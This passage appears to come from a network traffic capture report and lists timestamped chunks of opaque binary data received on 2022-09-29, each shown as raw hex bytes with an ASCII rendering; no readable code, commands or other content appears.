                                                                                                                                                2022-09-29 12:51:45 UTC23129INData Raw: b6 b1 91 27 0f bb cb ab 8a 09 97 cc 2e f2 3c ac 96 74 8f 42 de 80 c2 c6 46 b7 fb b7 4a 78 0b a5 8a 3e dc f3 9c 63 b9 8d 52 a1 a5 35 7f a8 92 6e 1a d6 b3 bd 7e 1c f5 d1 d2 0e 01 fa 9a 0f c1 49 36 ba 76 cc 76 71 e3 fb 75 d8 ca 0a 07 1e 3b 1e 11 aa e8 88 e2 80 9a 92 de 81 c1 9a bd 01 9e f3 ec ca a8 69 0a d1 0f 02 cd d4 bd 64 8d 96 84 1a d1 24 9d 0d a9 f3 8c c7 86 c0 7a b0 7d 47 08 7b 35 10 2e 6c 26 ef 9c b4 13 e6 4f 79 c5 3b df 3e 53 0d 3d 71 b7 98 a8 f6 95 ef 53 ca 14 64 2b f2 d5 bb 6a 8c 27 e4 53 3f 0e cd be ce 86 e8 b8 f0 57 14 1e 3b 95 37 22 44 f6 31 a9 d7 c4 2f 13 0d 2c c2 af 45 b1 6c ed 19 62 f8 73 e6 2b 90 4d d5 fd f8 85 25 04 ba 06 24 9b 86 22 26 00 9b 08 36 40 2c 5d 49 87 23 5d ae c1 c9 8d 81 17 44 a0 6a b7 61 41 ba 7c e6 a4 aa b8 76 76 da a1 74 78
                                                                                                                                                Data Ascii: '.<tBFJx>cR5n~I6vvqu;id$z}G{5.l&Oy;>S=qSd+j'S?W;7"D1/,Elbs+M%$"&6@,]I#]DjaA|vvtx
                                                                                                                                                2022-09-29 12:51:45 UTC23145INData Raw: 01 a1 41 59 b7 88 29 7c 39 ab ad 88 13 3f 91 47 b5 de 8c 09 6f 23 45 cd 00 6c f2 1d 31 45 ab 27 4e 7c 42 5e bf 27 fc 4a c4 19 10 be 1d 7b 5b d7 b0 07 7e d8 18 79 9a e7 29 7d c8 16 9d 44 d9 0a a4 fb ff 02 89 8f bd 26 66 56 73 25 41 df ed 1b bc fa d8 e9 3c 89 34 ac f8 4a 6e 5f b7 ca 30 a8 19 16 24 ae 27 b6 52 cb f8 d3 8d 5c 64 26 0b 41 fa c8 8c 0c 6d e4 58 a5 f0 38 1d 69 35 e3 3f 79 9e 99 b7 50 d4 90 bf e2 31 87 7d b3 62 23 1f 37 13 40 cc 88 24 14 7d da 74 97 95 8d 20 aa 10 31 2d 6c 9d 0c 07 ce 8a e0 42 40 de 50 74 c2 fe 7c 83 ed 13 d8 ff 4b 04 ea 7a f4 fd b6 55 b4 6b 9a 18 1e 31 d3 af e1 f0 ed 3c eb 9b d5 ad 43 ff fd 8b 34 ae b8 4e c9 2b bf 0b 34 7c c3 c6 66 ad 28 5c 3d f9 e6 3c a3 a4 cb 83 63 8b 4a b4 ab 3f 62 4f 4c 96 38 2e 98 ed ce 0f 32 73 8c f3 95 3b
                                                                                                                                                Data Ascii: AY)|9?Go#El1E'N|B^'J{[~y)}D&fVs%A<4Jn_0$'R\d&AmX8i5?yP1}b#7@$}t 1-lB@Pt|KzUk1<C4N+4|f(\=<cJ?bOL8.2s;
                                                                                                                                                2022-09-29 12:51:45 UTC23161INData Raw: 1f 2e 01 6e 07 70 a3 df 86 4b 36 98 01 e6 03 85 22 10 5c 5d ef 9e 88 25 6c fe b9 ec 8b d8 d9 4c e8 65 4a 74 24 3b 8c 0f 7e c4 28 2f 41 e7 70 99 5d 4f ca 0d b8 16 53 a6 45 3b 34 bf 30 4d 75 30 01 ff 33 d2 cf 78 30 e0 5b e3 0b ea 29 34 08 7e fa 46 9c a8 0e 90 0b 03 42 80 ad fc 8b ad 51 98 b1 26 b5 00 cf 0e 71 33 a8 95 5d 22 25 b8 2b b4 71 75 6c 47 b1 0b a1 8a 24 f0 1e 81 23 0e 5c c5 40 d0 a9 9e ec 5d 26 55 3c d1 b1 e5 a9 b4 12 b4 bd 41 d1 74 6e 8e ff 4d 13 92 8e d6 0c 00 74 60 99 a2 a0 07 2b b4 98 f8 0a 55 78 cf 44 6b 34 43 45 87 70 f7 bc 5e 8b cf bf 78 b0 fa 6f ac 15 fd 90 27 1c 21 c5 44 9e 0f 83 4a e7 d8 d0 7a 8f 9a a4 01 bd 3e a7 0e 6a 69 0c bd 9c 43 32 7c aa ef 10 40 17 dc a2 96 86 66 d7 e4 0c 78 f2 47 ff 37 cf 7b 51 22 c1 62 da 34 70 73 97 59 d5 79 9d
                                                                                                                                                Data Ascii: .npK6"\]%lLeJt$;~(/Ap]OSE;40Mu03x0[)4~FBQ&q3]"%+qulG$#\@]&U<AtnMt`+UxDk4CEp^xo'!DJz>jiC2|@fxG7{Q"b4psYy
                                                                                                                                                2022-09-29 12:51:45 UTC23177INData Raw: a6 85 34 56 25 10 2d 6d 7f 59 d2 f0 7c 75 4b 2a 56 42 1c 4e 4a d4 d0 9b cf 8f a9 6e de 44 8f 5b 4f 77 1b 4e ae 50 d6 85 27 34 8b d3 42 cf 7a e6 74 23 7d bd 78 89 08 80 9e 34 37 df 79 93 16 cb d5 c7 25 9c b5 c2 03 ef 7e 02 50 84 3f 83 28 47 f7 96 b6 9c fe 87 b3 4d 34 39 db 5f 33 70 52 4d 4e 4e 46 59 e5 e5 73 18 07 8c b5 d8 41 ba 27 37 99 c4 73 1e 9b 5e 57 0a db d7 62 fe a1 a5 eb c9 c1 88 f1 71 64 d5 4d b3 5d 50 ed 9e 75 47 35 bf b2 ac 77 e9 3a 16 1f 04 c5 57 f5 db 7d 41 f5 e5 39 ca 9a 54 d2 08 82 56 08 49 dc 50 9f ad 11 93 58 9c 09 18 62 39 81 64 16 ce b0 ee a7 48 8f 91 55 26 62 71 f5 24 cd fc 8e 6c 05 01 78 59 b8 bd b0 da 08 a0 aa 12 35 f4 2b 5f 83 16 fc 8f d6 2d 71 46 4c 13 5b f3 61 28 40 eb 50 e8 bc 57 e0 7a c3 82 97 99 67 3b d4 2c 55 3e ef f5 7d 90 63
                                                                                                                                                Data Ascii: 4V%-mY|uK*VBNJnD[OwNP'4Bzt#}x47y%~P?(GM49_3pRMNNFYsA'7s^WbqdM]PuG5w:W}A9TVIPXb9dHU&bq$lxY5+_-qFL[a(@PWzg;,U>}c
                                                                                                                                                2022-09-29 12:51:45 UTC23193INData Raw: 21 df 45 83 29 5b 4d d9 fb e0 e4 67 d4 ac cc 0e f6 e4 3c c6 44 75 47 ed cc 73 13 fd a9 f6 2a a5 b1 f3 f4 c3 2b 84 1b bd 2f b2 79 8d 82 2b 18 1f 64 7c 62 89 ce f2 a4 92 ee 3d b8 e4 62 18 8d af af 91 dd 53 dc 3a 07 b7 7d 32 b0 81 f5 ff 74 1a cd 09 35 15 e2 46 0f 50 6b 82 32 c8 85 e9 f8 fc 67 90 24 ac e9 89 2e f2 dd e0 2e ec b2 3f 6c 36 98 f9 b2 45 b7 8d a0 29 44 6d fe d3 09 76 08 ca ed 54 3f 0d 86 bd 54 bd 62 0e 75 f4 97 5d fb 55 e2 fb 99 53 5a fd 28 f7 cc f9 ea 49 53 b4 18 f3 18 27 ff 0f fb 3f 26 6f 95 a4 b6 69 f3 53 c6 7d 28 55 99 c2 b9 d6 0b 70 61 78 59 dd 27 80 af f8 e6 2b 55 e9 c9 8b 7a 3b 77 2d 14 80 93 a0 70 6a 8e 2d 77 00 e3 84 c3 8e 57 ea 7f cd 7d 97 ce b6 e6 f9 eb 55 19 14 4b 56 88 8f a4 37 6f c2 e0 26 2e 24 e4 26 40 0d bd 5a 76 ff 6a 70 d0 81 55
                                                                                                                                                Data Ascii: !E)[Mg<DuGs*+/y+d|b=bS:}2t5FPk2g$..?l6E)DmvT?Tbu]USZ(IS'?&oiS}(UpaxY'+Uz;w-pj-wW}UKV7o&.$&@ZvjpU
                                                                                                                                                2022-09-29 12:51:45 UTC23209INData Raw: 5e c0 f6 44 9d 36 83 92 eb 61 10 b3 e4 be 7b f5 e2 f9 9f fd 72 f4 67 34 0a c8 5c 4f de fd 8d 86 c7 2b bb 61 58 5c d1 92 67 b6 47 1e 1b 3e db 78 97 8b fb 82 0e 88 98 56 c6 1e 2e 65 ce 38 4e bb b3 d3 e7 72 be 0b eb 50 74 9a f0 6a f3 57 24 ed b6 7a 2a c5 42 94 1f 1f ba 3c 0e 85 b4 04 66 4c 6d 1e 85 b8 95 13 f4 61 1d 34 9b d5 6e 66 73 66 26 2d 5a dc b2 db 02 87 9e f4 dc 15 8d fd 9c ab b2 f1 fd df 61 51 3a 7a d8 31 0a bb 39 39 72 3b 1f 4f 77 ec 42 e1 cd 3b 04 61 ca d4 d3 b9 66 83 32 46 b7 da ea bd df 30 ce f8 6f cf fb dc 15 86 02 72 ee 43 3c 6a 51 bb 53 05 09 ea d5 7d 69 14 87 ad a5 71 cf fe d1 a1 55 db 07 a7 43 c8 bc a8 a7 75 7d 94 c8 14 d4 1b e1 7e 7f 54 d9 65 4b 7b 35 16 12 3f 78 35 10 62 d9 c6 d9 cb a1 52 39 a2 4f 2d 71 2d 66 48 fe 5d ef 6c b7 d8 e3 96 16
                                                                                                                                                Data Ascii: ^D6a{rg4\O+aX\gG>xV.e8NrPtjW$z*B<fLma4nfsf&-ZaQ:z199r;OwB;af2F0orC<jQS}iqUCu}~TeK{5?x5bR9O-q-fH]l
                                                                                                                                                2022-09-29 12:51:45 UTC23225INData Raw: 49 c5 72 9b 90 46 ba 6c fe 9b ba 67 e4 ae 9c f8 cc 04 08 8a aa 4b df a4 f1 95 89 4e 83 37 b7 00 1b 1f d1 78 86 90 c9 d3 f1 4d 18 82 47 fc 78 d0 0f 99 06 77 0f 81 a2 69 3c 47 4c d5 fd fb 74 f8 df 26 76 a0 21 ab 67 09 30 fd 08 6b 71 e2 17 bc 84 30 b3 c3 f9 51 4d 1c a3 2d ee 83 90 f8 f3 1e e5 b6 03 dd 55 b6 54 e0 f4 4e cb 6b aa a0 ff f5 64 9e 62 c9 52 63 3d b0 71 01 7b 2e 4d 23 c8 2b 3b 5c a6 69 27 0b c6 68 5c 66 86 12 41 80 71 1e ae 13 24 7e 1e 54 09 95 03 88 65 21 d0 c6 34 17 76 09 d9 67 36 1e f4 ee 3b a0 61 bd 4d 7e 01 84 37 52 e3 6d 26 37 9a 3f 67 63 51 ba 2a b9 93 1a 3d 25 e1 0c 8c 7a 30 7e eb 5f 01 36 f1 39 cf bd 3a 2b e5 38 87 bf e6 32 be 63 46 01 50 4e 42 e1 4f 39 29 2b a8 01 1b a8 39 44 59 d5 71 bb 2e 32 91 0a d1 29 b3 40 d7 a8 9c 12 7e 77 21 4a 0d
                                                                                                                                                Data Ascii: IrFlgKN7xMGxwi<GLt&v!g0kq0QM-UTNkdbRc=q{.M#+;\i'h\fAq$~Te!4vg6;aM~7Rm&7?gcQ*=%z0~_69:+82cFPNBO9)+9DYq.2)@~w!J
                                                                                                                                                2022-09-29 12:51:45 UTC23241INData Raw: 75 e1 f1 c3 90 72 9f 89 b2 1a e5 1e 91 db 03 ba 21 1f f8 9b 64 33 44 bd 51 5c 50 94 0f 0d 26 3d 97 76 44 fb 82 8b eb 0b 26 e5 05 0e 2c 72 89 f4 71 e4 89 99 08 14 f2 a5 b0 79 e1 30 1d 8d 39 f0 33 3e 42 60 53 ca 9d 0a 7f 3c 32 d4 63 90 f9 e8 e4 86 72 16 53 0e 55 23 29 9e 9d 15 57 9c 09 76 94 e0 84 bd c4 a0 f0 7b f7 87 d7 fd 43 ca 1e a4 77 3f 59 95 a8 44 5e de 99 ef b6 d6 71 fe 95 a5 6f eb 7e db 7b a7 7c 71 8c b3 72 ae 5a 1e e4 af 56 07 98 89 e5 d8 b8 f4 c5 34 de 50 97 ae 1f 63 89 d2 34 80 d0 4f 11 5a 62 6d 12 b7 00 3e c4 9a 32 af 3c a1 40 ab 4c 0f 3d f4 08 03 2b b7 d0 75 49 38 26 b2 81 43 6c 08 cc 85 95 0d 10 fb 44 70 24 55 6f c5 ce 79 54 d7 b1 4b b2 79 f5 73 9d c3 b3 9c 12 89 72 41 fb 1a eb b4 1e 83 39 64 fe 34 c3 97 59 bd 12 59 62 46 78 66 23 a3 57 ef 53
                                                                                                                                                Data Ascii: ur!d3DQ\P&=vD&,rqy093>B`S<2crSU#)Wv{Cw?YD^qo~{|qrZV4Pc4OZbm>2<@L=+uI8&ClDp$UoyTKysrA9d4YYbFxf#WS
                                                                                                                                                2022-09-29 12:51:45 UTC23257INData Raw: bf 55 d3 d9 2d 4b 5c 9a 0f dc 4e bf 8b 78 50 6d 23 71 52 bb f0 d3 4d 28 3f 82 45 aa ec 4d 24 9d 36 2d 5f 5c 15 8b 6b 75 3f a5 38 5e fb 1c c2 6e 78 e8 b9 4a cd a2 a1 a8 ee a3 3f 48 28 4a a6 39 cb 64 0a 00 69 76 51 87 33 62 03 83 e9 43 fd 35 f2 de 1c d9 19 79 9c b8 a4 db 42 4d 9b 01 7f d0 ae 92 09 6c 26 3e 0c c7 fb 26 9b 57 14 5f 27 b1 6e 45 8c 30 61 23 d1 4a f3 4b 7b c1 38 fd b7 e5 a3 3e 48 0e b0 3c 69 b5 50 82 30 2b 3e 55 ea 1f 0a 4c 85 02 2d d0 81 c5 e9 7b 46 68 58 3b 51 d4 c5 49 99 05 92 73 8c 3e 43 33 b2 a7 4b 30 12 77 9f dd 00 09 9d 5e cf b3 3e 6e 6c 26 f9 22 90 af 4b 90 b0 bf 8f 30 d1 18 0b 60 35 8f 73 ca aa c8 f2 04 dc 71 68 85 d7 66 74 ac 97 9c 7b eb 63 ab ac db b8 79 07 46 28 a1 65 10 29 44 c9 c8 06 f6 32 fc 54 a4 27 a9 de a0 bc ed 92 be 17 26 c6
                                                                                                                                                Data Ascii: U-K\NxPm#qRM(?EM$6-_\ku?8^nxJ?H(J9divQ3bC5yBMl&>&W_'nE0a#JK{8>H<iP0+>UL-{FhX;QIs>C3K0w^>nl&"K0`5sqhft{cyF(e)D2T'&
                                                                                                                                                2022-09-29 12:51:45 UTC23273INData Raw: 07 08 f2 e9 20 7e 44 a0 5d 43 f4 73 46 91 58 55 a7 c5 87 2f 85 bd df eb 0c 87 2f 60 b2 2e 31 5b 44 f2 96 f0 74 46 a6 fe 73 07 8a 88 93 38 ba b4 d2 2d 3b 66 e3 f3 00 46 b2 62 01 91 cb bd 92 52 fa 64 ca 80 06 2f 0b 54 f3 9c b4 fb 07 64 96 fc 51 91 2f 4c 32 40 52 81 28 8b c1 c4 7b 60 2b 7d 99 0d 1d 70 b2 2c 52 a6 49 8e f0 d0 a2 d9 59 af 4a 1f b3 1d e0 85 d4 ea 9a af e3 40 f0 c1 14 40 dd 57 21 5c 71 92 0e ea 78 29 4a cf 13 e4 7b a0 01 e3 02 4f 6f 54 d7 29 52 82 2f 3c ce f3 3b 20 e1 a6 b5 21 db 29 91 23 d7 90 3b 23 5e ec 1a 6c 51 57 46 56 03 d3 27 b8 27 de 6a 12 02 3d 3d c4 28 e3 db 45 fb 2f c5 32 94 a5 46 ec 64 d8 36 08 42 56 2a 81 37 85 27 d9 2a 09 a6 b9 78 fa c7 b1 ac 29 10 97 d9 44 bb 39 8a 66 50 b1 98 06 c8 bf 1a 70 5d 59 22 14 db ce 63 c7 60 0b 53 84 9b
                                                                                                                                                Data Ascii: ~D]CsFXU//`.1[DtFs8-;fFbRd/TdQ/L2@R({`+}p,RIYJ@@W!\qx)J{OoT)R/<; !)#;#^lQWFV''j==(E/2Fd6BV*7'*x)D9fPp]Y"c`S
                                                                                                                                                2022-09-29 12:51:45 UTC23289INData Raw: c5 26 e1 95 57 4f e4 01 1f 8b 6b d5 95 3d 76 c5 b9 7a 25 28 df fd be 2d a6 b1 a7 32 08 15 a3 85 a6 76 5f 36 fb 89 25 54 63 17 78 3e 41 86 d4 eb 20 a3 bd db 7e e3 78 e1 4b 7c bd 48 ab dc ab 46 0c 73 ce 49 b3 80 d0 ad 8f 20 9f a7 96 dc 86 2b 8f 22 6d e6 1f e1 6f bd b5 c1 6a 03 bb 20 e8 a5 1e b4 c6 ef da e5 f8 5b 83 40 21 5a 5d f0 61 a0 b7 94 db 65 6d f6 68 7c e4 6e ba b0 a1 a5 19 c2 5f dc 19 26 06 c8 50 94 1d a4 4d 90 80 39 4f 33 6a 56 2b 9e 54 dc 9a f4 75 f8 f4 64 63 c2 71 34 2b a5 57 72 09 34 21 c5 9b 6d 98 a8 be 23 aa 59 a9 52 e6 27 5c 49 bc 97 f4 fa 37 31 2e 4a d3 27 81 f8 45 1e f1 11 08 ab c2 01 d8 3b 00 85 e7 f1 52 5b 54 16 85 93 0e 95 5b d8 c7 56 44 12 14 c1 0f f0 a1 9f 53 ba 05 e1 9c 05 44 65 02 39 79 d6 fe 52 a3 95 d0 9a 0b a3 8a 50 e4 a3 d3 96 42
                                                                                                                                                Data Ascii: &WOk=vz%(-2v_6%Tcx>A ~xK|HFsI +"moj [@!Z]aemh|n_&PM9O3jV+Tudcq4+Wr4!m#YR'\I71.J'E;R[T[VDSDe9yRPB
                                                                                                                                                2022-09-29 12:51:45 UTC23305INData Raw: 6f 56 30 c1 a8 1b 2e 5e d5 2a ae c0 23 ef 6f 71 ff 6e c1 ef a0 cf ec c4 a5 a5 45 13 90 0c 5e ca ab 29 7a bd a0 8d 1b a1 dd b2 37 6c cc d7 ba 17 a4 1c c7 da fb 03 a6 8b d1 3e 41 8c 6c 51 91 14 0c 02 85 76 05 09 7a 94 7c 80 71 67 a1 6a aa 19 9d 6e 93 62 e4 66 3b 4f 7d fc 31 e9 f1 ab b2 4b c2 a0 d6 ef da dd 68 12 89 09 cd 1a 85 d5 d5 0d cc 7c 4c 61 f4 55 ee 0c 51 1a 60 47 a1 64 c5 8e 55 40 b6 0e 42 6d 8a f0 0b e1 80 c8 cb 70 fd 77 5b e4 70 69 83 0b 25 c7 d6 4a 26 24 13 5a d0 c5 01 7f dc b0 47 eb e2 1f b5 16 29 68 bd 5f dd d9 ba 43 33 34 1f 4b dc 75 e5 aa e4 fa fc eb 53 a3 e1 0f 37 21 06 36 66 d1 55 c3 d6 bd e2 8b 2c 45 ed 73 8a fa 00 bf 22 97 c7 1a 10 7f 59 65 2e 2a 75 d3 f5 ab 86 86 b3 13 48 08 aa 65 60 85 04 78 aa 56 72 36 6f 08 32 b8 f1 b0 57 13 54 ef a4
                                                                                                                                                Data Ascii: oV0.^*#oqnE^)z7l>AlQvz|qgjnbf;O}1Kh|LaUQ`GdU@Bmpw[pi%J&$ZG)h_C34KuS7!6fU,Es"Ye.*uHe`xVr6o2WT
                                                                                                                                                2022-09-29 12:51:45 UTC23321INData Raw: 58 7d ee 16 20 92 d6 57 69 30 88 ec 20 29 22 82 1d e5 a0 a2 5a da 2c bb ac 59 1a 66 74 45 e5 56 84 b7 49 2c 6a 0d da 62 52 21 39 52 94 56 86 ac 10 8f 1e 1b 6d eb 2d 52 1b b0 cb 45 71 ab 76 1b 3b d0 7a fb a3 17 8d a2 39 b1 ce d3 a3 ce fd 36 05 e0 73 f3 1b 89 d6 19 4b 7f 90 bd 3d b5 f9 2b 07 8a 9c 8a 3d a7 11 c7 20 74 a9 92 d2 8d 2e 13 e6 33 38 c8 92 4a 31 31 07 17 e0 b0 5c eb 98 da 6a 8e f9 7c 7d 0a ea 5e 7f 30 ed 27 7a 2c ea 5a 1e 57 93 1c a0 a6 7b 01 7d e7 c9 07 30 df e9 82 cf 0c f1 21 e8 32 b3 c4 c7 0a ae 92 46 12 c5 92 96 8b 47 de 59 b7 35 e8 75 b5 21 f2 da 42 d2 ce 8c ee 41 ae 9a 18 3a e1 c9 a8 5e 94 3c 33 c8 69 70 ae d7 41 c5 6f 58 ed 22 f0 fd fe 88 b1 02 55 35 a0 9f af b6 1a 4f 09 88 30 9c fd 27 ff 34 45 53 d8 f5 fe 5f b0 50 0b c9 33 5a 3a 2d 7f 48
                                                                                                                                                Data Ascii: X} Wi0 )"Z,YftEVI,jbR!9RVm-REqv;z96sK=+= t.38J11\j|}^0'z,ZW{}0!2FGY5u!BA:^<3ipAoX"U5O0'4ES_P3Z:-H
                                                                                                                                                2022-09-29 12:51:45 UTC23337INData Raw: 5c 1f 9c a8 80 70 fe 95 0f fa 60 e2 0d e6 c3 39 2e 03 0d 27 81 1b e5 a3 31 2a 87 61 0f 02 ab 4f f3 65 12 f0 85 c4 dc 40 c6 58 7e b4 7a ac c3 a2 a2 26 4e 66 e7 7a cd 33 8a 75 d6 aa e0 a5 2f 0b 33 85 37 ee e4 02 1c 4d 50 1c 4b fa 37 f5 94 b4 64 6f 58 dd f2 29 15 7a d0 e6 57 31 6b dd c4 f9 2f 13 47 38 04 3f 9e 2d 05 35 2d ed 8d 46 76 cd c8 ee fd f7 c9 8f c1 8d 24 41 d4 0c 31 51 c7 cd e6 12 3c 48 c2 da ee ee 01 af 66 3a 96 be 48 14 ae a4 dd b8 ac 41 92 37 1d e5 36 88 fb 71 19 fc 04 42 6a 03 d3 1c e4 14 c2 f1 d1 0e a5 c8 79 19 ff d4 b3 72 da 6e 96 5d 7f d5 5b b7 0e 83 bb 27 64 a7 71 d3 b3 c9 19 80 16 88 51 fa 8c 0c 1f 66 c8 a4 c0 ae 41 97 b8 14 0e fb 25 d0 56 9d fc 66 ef cc 4a 83 87 80 39 4f 27 d5 d0 d8 ae 4e df 54 bb 9a ae 5e 40 48 62 27 58 b3 3d 8e a9 b8 41
                                                                                                                                                Data Ascii: \p`9.'1*aOe@X~z&Nfz3u/37MPK7doX)zW1k/G8?-5-Fv$A1Q<Hf:HA76qBjyrn]['dqQfA%VfJ9O'NT^@Hb'X=A
                                                                                                                                                2022-09-29 12:51:45 UTC23353INData Raw: f3 50 be 62 90 4a 30 de 4f 56 93 7f a0 0b 8f 06 b3 6f 0c a2 7b 4e da 95 9a 31 09 b4 5c ff ea 88 9d 32 dc 9b bd 45 a3 4e f0 e1 0c 47 8f f3 87 d5 a5 09 97 16 cd 1a 9c a4 bb 04 75 4b 31 d7 d4 2e cd af 2a f9 fc 26 bd b5 9d ae 61 c3 b0 27 a4 e4 5f 9b 9b 24 cb 7c ff 9f 96 80 9d c9 33 88 0c 9f 4f 77 bf 60 de 85 d6 5d 44 d0 09 d5 39 a6 62 4a 16 4c 5c 30 60 20 a9 f5 8a 4a ec a6 dc 4d 98 31 31 2d f3 39 5d 39 ed 70 ed c4 66 ce 76 22 08 79 42 b5 55 55 91 b7 63 3e fd 2c bd d9 4a 16 eb a0 34 3e 99 6b b9 92 8c 38 93 79 19 4c 60 38 b1 8f f7 10 9d 8c b1 19 23 40 f6 95 06 e6 8e e3 19 fa 7c 21 7f eb bb 6d 75 01 df ad 0e 9e d1 16 ff 54 36 34 83 9f 65 bc 2c 63 3e f9 bc a3 4c 3d 07 a5 9e 70 8a 80 51 ee 6d 2e 8e 7d 67 7b ea 76 91 7b 82 30 d7 78 58 01 71 68 b1 19 aa 2d 29 67 02
                                                                                                                                                Data Ascii: PbJ0OVo{N1\2ENGuK1.*&a'_$|3Ow`]D9bJL\0` JM11-9]9pfv"yBUUc>,J4>k8yL`8#@|!muT64e,c>L=pQm.}g{v{0xXqh-)g
                                                                                                                                                2022-09-29 12:51:45 UTC23369INData Raw: ff 9b 9b f8 a3 bb 93 a8 b5 b4 38 37 b6 db 3d a6 c9 c2 09 34 e7 c6 cc ba a3 e9 e2 90 c6 ca 05 5c 41 49 94 bf 17 98 5f 01 4b 64 18 5a 0c f9 c9 55 73 92 76 48 fb 0d 4c 48 67 4f 39 47 6c a5 34 8a 58 53 05 7e eb df 02 3d 38 40 c1 2d b0 7a e0 55 a0 1f 49 7a 55 45 14 ba 8d 01 32 81 2c d2 69 30 c7 02 51 f5 20 46 e0 7f 7d 32 ed 48 52 fd 5c f1 dd e6 89 18 98 1a fa 07 ed 0a 51 30 89 53 9b fe ee e6 cb 03 fc f2 b8 1e 56 d7 1a 68 1d 7b 37 2b bc 06 9c 7e 44 9d 25 17 1c e8 30 f4 1a f3 43 6a 96 a8 09 b2 32 6c 58 33 f2 05 39 d4 78 2c 0f 4b b6 b1 c5 83 3c 32 37 69 8c 48 10 69 63 d6 94 05 26 09 7b 0e ea 31 54 f0 93 4f 61 db c5 fe f8 a8 47 4b 9d 76 c0 da c9 23 79 bf 3a d3 31 33 de 0b f5 16 30 36 24 6c c3 9d a3 d8 d3 69 6f 47 54 c4 b5 f1 48 d4 fe 42 25 42 3c 71 44 99 04 a8 72
                                                                                                                                                Data Ascii: 87=4\AI_KdZUsvHLHgO9Gl4XS~=8@-zUIzUE2,i0Q F}2HR\Q0SVh{7+~D%0Cj2lX39x,K<27iHic&{1TOaGKv#y:1306$lioGTHB%B<qDr
                                                                                                                                                2022-09-29 12:51:45 UTC23385INData Raw: 4a 50 1e 30 f9 33 62 6d 31 59 44 27 75 fd 42 5d df 5c c3 f7 33 fc d6 a9 6e 17 20 19 f7 15 df 92 57 42 4f c8 1c f1 db ff 56 5c 4d 45 ff ba b6 4b e5 fb 3a a8 11 2a af 0b 47 74 68 7d 05 1c 1a ec c3 8a ef c9 44 eb cc 78 95 d0 a2 6d b0 0c ae 8c 33 40 c5 1b 2a 6d 4d 2c 42 17 76 de 52 b6 43 ad 90 10 c0 25 d2 e5 5e 63 e2 53 3f fc 14 61 26 6e 48 bd c4 97 43 85 89 ed 76 66 1a 4f 95 85 b2 88 8b 58 6a 92 a9 74 f7 ff b4 01 2a 8e c9 8b 43 1d 11 57 c2 4d db 51 4b df 68 85 ea a1 03 5f c9 6c f5 53 93 be 5d 26 8d 6a 41 92 d0 dd 29 ab 12 27 d1 75 33 01 7b 3c a0 4e 1b 42 a9 c7 e3 b1 ea a7 fd c3 3f f7 17 19 fe b3 62 b6 1b 28 9f 5f c9 18 58 b8 8d 91 5f 16 e9 70 23 11 3c e0 2b 4c 0a 02 6a 89 22 38 ab 44 78 b3 a9 6b 06 22 04 9e 57 d2 f3 59 e9 73 8f e3 68 66 d9 d1 e8 4e 1c 18 c9
                                                                                                                                                Data Ascii: JP03bm1YD'uB]\3n WBOV\MEK:*Gth}Dxm3@*mM,BvRC%^cS?a&nHCvfOXjt*CWMQKh_lS]&jA)'u3{<NB?b(_X_p#<+Lj"8Dxk"WYshfN
                                                                                                                                                2022-09-29 12:51:45 UTC23401INData Raw: dd 5a 7d 24 db f8 50 50 69 2d 26 7c 3a 55 d1 f2 0c 6d 8e 5d 29 26 b2 14 2b c0 95 5b 0f 91 d9 5d f4 c8 73 8f c5 5b 7c 96 b6 9a 08 4a 77 52 4c cb a7 70 f4 b8 af 85 c9 77 ee 69 1b 54 1f 23 28 38 7f 3f 7b 5a 68 50 9a c2 50 8f 21 77 df 9f ba e3 be 70 f7 a2 88 5e e7 94 e2 bd af 6b f1 e1 b1 94 93 10 6d 3f 64 74 99 1b 9b a7 67 bf dc 19 c9 a9 65 8f 2b fc 38 f1 b8 8a c3 94 f9 09 d0 58 2d e5 36 f8 a4 73 ff 77 3a 64 2f d6 93 e9 a4 55 18 e0 db 4f ed 85 d5 8f 5e 2d fe df c4 e3 93 f3 71 70 4e 91 73 c6 19 e6 f8 8d 3e f5 d0 6c b7 b3 e7 79 cf 76 0d c5 d3 6d 36 2f d3 e8 cf 97 25 ec 65 b7 97 66 52 5c 0a a9 20 80 3e 55 83 83 52 d2 0b cd 5d a4 cc 69 db 04 61 51 70 85 2e d0 5c 3c f1 f1 97 85 2a 9f 54 e3 57 03 22 32 6f cd c0 59 39 6b 21 37 8e e5 70 8c 08 7e d9 49 13 0d 92 82 52
                                                                                                                                                Data Ascii: Z}$PPi-&|:Um])&+[]s[|JwRLpwiT#(8?{ZhPP!wp^km?dtge+8X-6sw:d/UO^-qpNs>lyvm6/%efR\ >UR]iaQp.\<*TW"2oY9k!7p~IR
                                                                                                                                                2022-09-29 12:51:45 UTC23417INData Raw: 06 45 99 b2 0c 13 4c 5a 22 11 4d 73 02 6e 74 93 81 47 5f dc 2d 5d b1 aa 57 8e 81 93 db f0 79 1e 97 a3 7d ef ae 6c f5 f7 32 64 ea 0a 86 b9 df 6f f8 1b 98 c6 b0 3f e7 6c 46 25 e3 a6 58 32 9e 7f 3f 3a 49 59 cb 11 9d f0 f0 ea 41 89 8b 82 26 6f a8 ea 19 74 19 d8 17 53 02 18 d9 42 94 bf 8f 19 b7 9f 24 20 63 16 13 b1 fc 07 bc 06 1f 34 0a 25 3c c9 aa 4c 65 9e fd fe 17 be 00 7a 6c 8b ad 67 e3 54 fc 29 a9 92 31 37 f0 f4 07 f2 ed 24 4c 43 31 7a 68 ca 0e 0a 17 e3 96 17 93 1f 94 b7 25 da 63 2b fc ef b4 f7 96 d2 ae 68 be b6 db 4c 9a c6 43 a5 22 43 4f b5 f0 62 ed 88 a8 fc 04 c9 ac 10 54 6e d5 23 28 cd 31 18 9a ed 87 c9 b4 f4 fd 5a 3e bd 36 62 f9 a1 55 7c 39 a3 d5 6a 84 b2 d0 1f 5c 7b c7 a7 80 d5 36 22 26 00 21 c7 ab ea 59 15 1f 60 57 35 d1 96 2a e8 cf 63 9e fd 71 95 0e
                                                                                                                                                Data Ascii: ELZ"MsntG_-]Wy}l2do?lF%X2?:IYA&otSB$ c4%<LezlgT)17$LC1zh%c+hLC"CObTn#(1Z>6bU|9j\{6"&!Y`W5*cq
